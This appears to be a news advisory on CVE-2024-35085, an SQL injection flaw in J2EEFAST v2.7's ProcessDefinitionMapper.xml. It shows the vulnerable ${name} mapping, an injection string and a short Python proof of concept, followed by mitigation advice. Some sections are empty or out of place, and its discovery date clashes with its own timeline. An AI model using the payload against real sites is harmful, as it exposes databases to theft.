CVE CyberSecurity Database News

CVE-2024-35085 - SQL Injection in J2EEFAST v2.7. via ProcessDefinitionMapper.xml — What You Need to Know

Poster -

In June 2024, a critical security vulnerability, CVE-2024-35085, was discovered in J2EEFAST v2.7.. This flaw allows attackers to perform SQL injection through the findPage function defined in ProcessDefinitionMapper.xml. In this long-read, we'll break down what this vulnerability means, show a code snippet of the problem, guide you through a potential exploit, and share trusted references.

What is J2EEFAST?

J2EEFAST is an open-source rapid development platform for Java web applications. Designed for speed and extensibility, it’s used by developers to build enterprise portals and admin dashboards.

About CVE-2024-35085

CVE-2024-35085 affects the findPage function in the ProcessDefinitionMapper.xml configuration. If you’re running J2EEFAST v2.7., your application is potentially exposed to attackers who could access or alter your database through forged SQL queries.

How Does the Vulnerability Work?

At its core, this vulnerability arises because untrusted user input is not properly sanitized before being passed into a SQL query. This allows a malicious user to inject SQL code to manipulate database operations.

The Problematic Code

Here is a simplified version of what the vulnerable XML mapping might look like in ProcessDefinitionMapper.xml:

<select id="findPage" parameterType="java.util.Map" resultType="com.j2eefast.WorkflowEntity">
  SELECT * FROM workflow_process_definition
  <where>
    <if test="name != null and name != ''">
      AND name LIKE '%${name}%'
    </if>
  </where>
</select>

The issue:
Notice how ${name} is directly embedded. If a user provides a value for name, it is dropped right into the query with no escaping or parameterization.

Example Exploit

Let’s assume the application exposes a search field for process names. An attacker could submit the following as the process name:

%' OR '1'='1

The resulting SQL:

SELECT * FROM workflow_process_definition WHERE name LIKE '%%' OR '1'='1%'

What happens:

A Python Proof-of-Concept

Suppose the backend endpoint is accessible at /workflow/processDefinition/list. Here’s an example using requests in Python:

import requests

url = "http://your-j2eefast-site.com/workflow/processDefinition/list";
payload = {
    "name": "%' OR 1=1 -- "
}

response = requests.post(url, data=payload)

print(response.text)  # Should print all records if vulnerable

*(Replace the URL with your actual J2EEFAST endpoint)*

To protect against this vulnerability

1. Upgrade: Check for updates and patches from J2EEFAST. As of this writing, no official patch has been published.
2. Sanitize Input: Always use parameterized queries in MyBatis, e.g., use #{name} instead of ${name}:

- J2EEFAST GitHub
- CVE Details on Mitre
- Xen1thLabs Advisory
- OWASP SQL Injection Guide

Conclusion

CVE-2024-35085 is a high-risk vulnerability that affects J2EEFAST v2.7. by allowing anyone to perform SQL injection via the findPage method in the XML mapping file. By understanding its simplicity, all Java and MyBatis developers should audit their code, sanitize user inputs, and keep their frameworks updated.

If your organization uses J2EEFAST, act now — a single neglected form field can give attackers the keys to your data kingdom.

Timeline

Published on: 05/23/2024 17:15:30 UTC
Last modified on: 08/19/2024 16:35:14 UTC